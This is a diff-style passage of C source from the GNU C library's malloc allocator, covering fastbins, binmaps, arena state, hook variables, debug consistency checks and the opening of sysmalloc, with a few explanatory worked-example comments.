+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
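+
+/*
+  Worked example, assuming a 64-bit build (SIZE_SZ == 8): a 0x20-byte
+  chunk lands in fastbin_index (0x20) == (0x20 >> 4) - 2 == 0, and the
+  default max_fast of 0x80 (DEFAULT_MXFAST run through set_max_fast)
+  covers fastbin indices 0 through 6.
+*/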
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits of max_fast never matter in size comparisons,
+   they were historically used as flags; in this version the flags live
+   in the arena's separate flags field.
+ */
+
+/*
+   FASTCHUNKS_BIT, kept in the arena's flags field, indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs to
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
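+
+/*
+  perturb_byte is normally enabled from outside this file, e.g. via the
+  MALLOC_PERTURB_ environment variable or mallopt's M_PERTURB option; a
+  non-zero value fills newly allocated memory with perturb_byte ^ 0xff
+  and freed memory with perturb_byte, as implemented above:
+
+    MALLOC_PERTURB_=204 ./a.out
+*/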
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
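+
+/*
+   Worked example (illustrative only; assumes a 64-bit build with
+   SIZE_SZ == 8, 4 KiB pages and the default mmap_threshold of 0x20000):
+   a request that normalizes to nb = 0x21000 takes the mmap path below,
+   and the mapping size becomes
+
+     size = ALIGN_UP (0x21000 + SIZE_SZ, 0x1000) = 0x22000
+
+   The returned chunk is flagged IS_MMAPPED and handed back to the
+   caller at chunk2mem (p) = p + 2 * SIZE_SZ; it never enters a bin and
+   is released with munmap_chunk() rather than _int_free().
+ */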
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
